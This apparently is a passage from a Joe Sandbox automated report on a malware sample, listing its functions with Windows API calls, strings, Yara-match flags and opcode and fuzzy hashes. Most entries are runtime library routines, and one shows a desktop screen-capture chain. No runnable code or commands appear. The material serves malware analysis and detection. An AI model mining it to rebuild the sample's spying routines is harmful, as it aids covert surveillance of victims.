                                                                                                  • HeapDestroy.KERNEL32(00000000), ref: 009764A3
                                                                                                  • HeapCreate.KERNEL32(?,?,?), ref: 009764B5
                                                                                                  • _free.LIBCMT ref: 009764C5
                                                                                                  • HeapDestroy.KERNEL32 ref: 009764F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Destroy_free$CreateFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 4097506873-0
                                                                                                  • Opcode ID: 3a3d4da5adcf6168439ea17cde9e7dd29ec7fbb1d7e7617eff49dd30a833576e
                                                                                                  • Instruction ID: 358523e93c8ca3c42376f4753985e075344c4be05975539b33bbf2d86281d045
                                                                                                  • Opcode Fuzzy Hash: 3a3d4da5adcf6168439ea17cde9e7dd29ec7fbb1d7e7617eff49dd30a833576e
                                                                                                  • Instruction Fuzzy Hash: F6F037BA600B02ABE7209F29E848B53B7F8FF84710F158518E85D93350DB34E855CBA0
                                                                                                  Function 0092718D Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 865245655-0
                                                                                                  • Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                                                  • Instruction ID: e23530de486955f421b2658c5bfa5014b1184594fc7b036eecbe39a7a5054668
                                                                                                  • Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                                                  • Instruction Fuzzy Hash: F2F09674419220ABC704BFF0EC49E0E7BACEF8D340B21C418F9049B21BEA35D841CBA0
                                                                                                  Function 0282F383 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 865245655-0
                                                                                                  • Opcode ID: 966baa02cbab0462d49951f9c363315c70f1ec3e6bd818d3c9011fc18f246283
                                                                                                  • Instruction ID: c53b8c1c75ee02ea2ba693edb3285484e62184940a9422ec850593a93ddf3f95
                                                                                                  • Opcode Fuzzy Hash: 966baa02cbab0462d49951f9c363315c70f1ec3e6bd818d3c9011fc18f246283
                                                                                                  • Instruction Fuzzy Hash: C3F0127C400255AFD709AFA5CA4890E7BAAAF843147248594E909CB712EB35D446DED2
                                                                                                  Function 03FB3C7F Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 865245655-0
                                                                                                  • Opcode ID: 966baa02cbab0462d49951f9c363315c70f1ec3e6bd818d3c9011fc18f246283
                                                                                                  • Instruction ID: e77dcbe13b7afa751bfe3a023716a3445658e9771a497880cb331fd4849d5a52
                                                                                                  • Opcode Fuzzy Hash: 966baa02cbab0462d49951f9c363315c70f1ec3e6bd818d3c9011fc18f246283
                                                                                                  • Instruction Fuzzy Hash: 2BF049F8604355BBC708FFB2CD4888E7BFDAF842407258454E9088B211EB35D84A8AE5
                                                                                                  Function 02829E1F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc
                                                                                                  • String ID: &
                                                                                                  • API String ID: 845055658-3042966939
                                                                                                  • Opcode ID: 96f475fef29d70f25b531db5fbbeac76c6573e20d4e1e8de80fbd7a54519110d
                                                                                                  • Instruction ID: d6ffc46b70cbff9d4ec010f211620c88dc55526dcb3016a88785a2fbfec04606
                                                                                                  • Opcode Fuzzy Hash: 96f475fef29d70f25b531db5fbbeac76c6573e20d4e1e8de80fbd7a54519110d
                                                                                                  • Instruction Fuzzy Hash: 0151667DD00229AFDB00DFE4C844AEEB7B9EF48314F208119E909E7650D774A989CBA1
                                                                                                  Function 03FAE71B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc
                                                                                                  • String ID: &
                                                                                                  • API String ID: 845055658-3042966939
                                                                                                  • Opcode ID: 96f475fef29d70f25b531db5fbbeac76c6573e20d4e1e8de80fbd7a54519110d
                                                                                                  • Instruction ID: 1a102108374501782062d51db76b649629eafaae6bf876fff97896f24229d552
                                                                                                  • Opcode Fuzzy Hash: 96f475fef29d70f25b531db5fbbeac76c6573e20d4e1e8de80fbd7a54519110d
                                                                                                  • Instruction Fuzzy Hash: 0F5153F5E1061AAFDB00DFA9CD849EEB7B8EF58200F144519E915AB250D734A905CBA0
                                                                                                  Function 0282C2CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_wcsrchr
                                                                                                  • String ID: D
                                                                                                  • API String ID: 1675014779-2746444292
                                                                                                  • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                  • Instruction ID: 61aad9a56d72518c3db81c7dffbd7e7334306e0e68016ecf5f2483b2ad6ef196
                                                                                                  • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                  • Instruction Fuzzy Hash: BD312B7A9402287BE72497A49C89FFF777CEB04710F104125FB09EA1C0EA71594ACBE6
                                                                                                  Function 03FB0BCB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_wcsrchr
                                                                                                  • String ID: D
                                                                                                  • API String ID: 1675014779-2746444292
                                                                                                  • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                  • Instruction ID: 4f47f64767c5c40cb42eaed2719c0dc611e72b9f6371630685046bd10995f906
                                                                                                  • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                  • Instruction Fuzzy Hash: 2C3108B69402197BE720EBE58C89FEFB77CEB44710F140129FB09AA1D0EE316905C6A5
                                                                                                  Function 02D0B19D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D0BC70: GetDesktopWindow.USER32 ref: 02D0BC8F
                                                                                                    • Part of subcall function 02D0BC70: GetDC.USER32(00000000), ref: 02D0BC9C
                                                                                                    • Part of subcall function 02D0BC70: CreateCompatibleDC.GDI32(00000000), ref: 02D0BCA2
                                                                                                    • Part of subcall function 02D0BC70: GetDC.USER32(00000000), ref: 02D0BCAD
                                                                                                    • Part of subcall function 02D0BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 02D0BCBA
                                                                                                    • Part of subcall function 02D0BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 02D0BCC2
                                                                                                    • Part of subcall function 02D0BC70: ReleaseDC.USER32(00000000,00000000), ref: 02D0BCD3
                                                                                                    • Part of subcall function 02D0BC70: GetSystemMetrics.USER32(0000004C), ref: 02D0BD78
                                                                                                    • Part of subcall function 02D0BC70: GetSystemMetrics.USER32(0000004D), ref: 02D0BD8D
                                                                                                    • Part of subcall function 02D0BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 02D0BDA6
                                                                                                    • Part of subcall function 02D0BC70: SelectObject.GDI32(?,00000000), ref: 02D0BDB4
                                                                                                    • Part of subcall function 02D0BC70: SetStretchBltMode.GDI32(?,00000003), ref: 02D0BDC0
                                                                                                    • Part of subcall function 02D0BC70: GetSystemMetrics.USER32(0000004F), ref: 02D0BDCD
                                                                                                    • Part of subcall function 02D0BC70: GetSystemMetrics.USER32(0000004E), ref: 02D0BDE0
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • _memset.LIBCMT ref: 02D0B1E1
                                                                                                  • swprintf.LIBCMT ref: 02D0B204
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                  • String ID: %s %s
                                                                                                  • API String ID: 1028806752-581060391
                                                                                                  • Opcode ID: ceb5099551ecbb7f38e4a6b9d9102e9d59c4cbc475059915f4dba22e8bfd4794
                                                                                                  • Instruction ID: 52b0098e23288ca87646fef87e91456151426ba609f79b52a89411d8ef5872fe
                                                                                                  • Opcode Fuzzy Hash: ceb5099551ecbb7f38e4a6b9d9102e9d59c4cbc475059915f4dba22e8bfd4794
                                                                                                  • Instruction Fuzzy Hash: CD21B472A04340ABD210EB25A8C5F5BB7E9EFD9714F04452EF48956391E7619D08CBB3
                                                                                                  Function 02D09100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D09115
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF4E
                                                                                                    • Part of subcall function 02D0EF39: __CxxThrowException@8.LIBCMT ref: 02D0EF63
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF74
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D09128
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                  • String ID: string too long
                                                                                                  • API String ID: 963545896-2556327735
                                                                                                  • Opcode ID: 0a3534205a400d303b695cafb60f61a50b261ed5054771f0e8ae0175edf9ea8d
                                                                                                  • Instruction ID: 7d28704062c204baf31be3f223747e9943bb5728f64ebeca900f23bafc65ef77
                                                                                                  • Opcode Fuzzy Hash: 0a3534205a400d303b695cafb60f61a50b261ed5054771f0e8ae0175edf9ea8d
                                                                                                  • Instruction Fuzzy Hash: EF1193753443508BD3218E2CE894B56BBE5EBE5A21F100A6AE191877E2C7B1DC05C7B6
                                                                                                  Function 02D093F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D0941D
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D0944A
                                                                                                  Strings
                                                                                                  • invalid string position, xrefs: 02D09445
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                  • String ID: invalid string position
                                                                                                  • API String ID: 3614006799-1799206989
                                                                                                  • Opcode ID: 43c81e12d1d17a02cd06da4a084e3da6a66a0dcbedfea201f2c8b497c3988773
                                                                                                  • Instruction ID: c559b1273c0f216d9add50862951d89e0e4162fb972c3b900f7019a365a17c70
                                                                                                  • Opcode Fuzzy Hash: 43c81e12d1d17a02cd06da4a084e3da6a66a0dcbedfea201f2c8b497c3988773
                                                                                                  • Instruction Fuzzy Hash: F401F2322002105BD324AE68E8D4BCAF796EB40B24F140A29E1568B7D1D771ED448BA4
                                                                                                  Function 00926FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 00926FFC
                                                                                                    • Part of subcall function 009270E4: __getptd_noexit.LIBCMT ref: 009270E4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: 4ea230d637fa5764a43ecdf8be00f7d262e1573a93248e79ca2350081dd71a3f
                                                                                                  • Instruction ID: 52b35581961c929a436d9042d021fbdb195ca41707b9c2a3b15b75da8fbd702a
                                                                                                  • Opcode Fuzzy Hash: 4ea230d637fa5764a43ecdf8be00f7d262e1573a93248e79ca2350081dd71a3f
                                                                                                  • Instruction Fuzzy Hash: 5301AD7290422D9BDF009FA4EC01BEEBBF8FB48364F000115F924B6285E7749504CBA1
                                                                                                  Function 0282F179 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 0282F1D4
                                                                                                    • Part of subcall function 0282F2DA: __getptd_noexit.LIBCMT ref: 0282F2DA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                  • Instruction ID: 1988ccaa2bd081d710fd251cf95836add5c89c7750c1847e36ffce4ee71a1f37
                                                                                                  • Opcode Fuzzy Hash: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                  • Instruction Fuzzy Hash: 6C016D79E002699BDF119FA8CC00BEEBBF5EB04364F504215E928E6280D7749555CFB2
                                                                                                  Function 02D0F7BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 02D0F815
                                                                                                    • Part of subcall function 02D0F91B: __getptd_noexit.LIBCMT ref: 02D0F91B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                                  • Instruction ID: c338a39d9f9cd2842e9328fb11d38dc152aad90a4885d41a6077474587c70027
                                                                                                  • Opcode Fuzzy Hash: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                                  • Instruction Fuzzy Hash: 8501AD71D00259AFDF109FA4DC41BEEBBB9FB48364F204115E924A67D0DB749901CBB5
                                                                                                  Function 00976FCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 00977025
                                                                                                    • Part of subcall function 0097710D: __getptd_noexit.LIBCMT ref: 0097710D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: fd1fdc686e426d0524c4a0ace4d10a2df1a110a2837cd7d0ca9d2c171b75a8c9
                                                                                                  • Instruction ID: d3a01c25250030a59380cb089c7233b6bd39c25e33029b691a2cbecb7a17f2ac
                                                                                                  • Opcode Fuzzy Hash: fd1fdc686e426d0524c4a0ace4d10a2df1a110a2837cd7d0ca9d2c171b75a8c9
                                                                                                  • Instruction Fuzzy Hash: 250161729042599BDF009FA4DC01BEEBBB8EB44364F108115F928A6281D774D901CB65
                                                                                                  Function 03FB3A75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 03FB3AD0
                                                                                                    • Part of subcall function 03FB3BD6: __getptd_noexit.LIBCMT ref: 03FB3BD6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                  • Instruction ID: ed0b57e2237dcdf396e8841c233bc630f71e4e84041f81f103997d245dda58c7
                                                                                                  • Opcode Fuzzy Hash: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                  • Instruction Fuzzy Hash: 230161B99002199BDF10DFA6CC01BEEBBB8FB44364F244116E824E6280E7759501CB71
                                                                                                  Function 02D09570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D0957F
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EF9B
                                                                                                    • Part of subcall function 02D0EF86: __CxxThrowException@8.LIBCMT ref: 02D0EFB0
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EFC1
                                                                                                  • _memmove.LIBCMT ref: 02D095B5
                                                                                                  Strings
                                                                                                  • invalid string position, xrefs: 02D0957A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                  • String ID: invalid string position
                                                                                                  • API String ID: 1785806476-1799206989
                                                                                                  • Opcode ID: f1cc09ac8dc26196695033cc702a5ea1eb83aced3ff2ae3940b20ad974faac55
                                                                                                  • Instruction ID: dfca570eb95327ad330a7034dbb2d5ca63d86aa966c773c03a5d5493b212603f
                                                                                                  • Opcode Fuzzy Hash: f1cc09ac8dc26196695033cc702a5ea1eb83aced3ff2ae3940b20ad974faac55
                                                                                                  • Instruction Fuzzy Hash: 2E0144313006014BD7258A6DE9E875EB7E7DBC5904B644928D081C77DAD6B1DC4287A4
                                                                                                  Function 02D0D1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D0D1D4
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF4E
                                                                                                    • Part of subcall function 02D0EF39: __CxxThrowException@8.LIBCMT ref: 02D0EF63
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF74
                                                                                                  • _memmove.LIBCMT ref: 02D0D20D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1785806476-3788999226
                                                                                                  • Opcode ID: 3e1793caa54bac6624b49afb9c640bb96d29a13ee6af4b90037f2f2de8e944ef
                                                                                                  • Instruction ID: d2f37cff9e8c68e4d4cbfb77ae9236aa1cfd6176bc862e885d59aa3537fdc63d
                                                                                                  • Opcode Fuzzy Hash: 3e1793caa54bac6624b49afb9c640bb96d29a13ee6af4b90037f2f2de8e944ef
                                                                                                  • Instruction Fuzzy Hash: 8F01F573E401139FC704DF69E8C0D2A77D9E65021074A4A2AEC1AE3790E7F2EC248BA0
                                                                                                  Function 02D08430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D08443
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF4E
                                                                                                    • Part of subcall function 02D0EF39: __CxxThrowException@8.LIBCMT ref: 02D0EF63
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF74
                                                                                                  • _memmove.LIBCMT ref: 02D0846E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1785806476-3788999226
                                                                                                  • Opcode ID: 73639cac21f6ce81e3477eb32742910142ba40fb6b7ea67406cc98bb4557129a
                                                                                                  • Instruction ID: d8d101a61c9d3a03a4ad5df65637c9bdf199b98e8cf51af3951c8cee64efc820
                                                                                                  • Opcode Fuzzy Hash: 73639cac21f6ce81e3477eb32742910142ba40fb6b7ea67406cc98bb4557129a
                                                                                                  • Instruction Fuzzy Hash: 3C018FB16002058FDB28DEA8DCD1A2AB7DAEB54214B18492DE896C7790E670FC04CB60
                                                                                                  Function 00933414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallFrame@12Setting__getptd
                                                                                                  • String ID: j
                                                                                                  • API String ID: 3454690891-2137352139
                                                                                                  • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                  • Instruction ID: 3f9b2835d5b4333de25a794ca70b2c3c07f7c48da1a33638e308e6157613e334
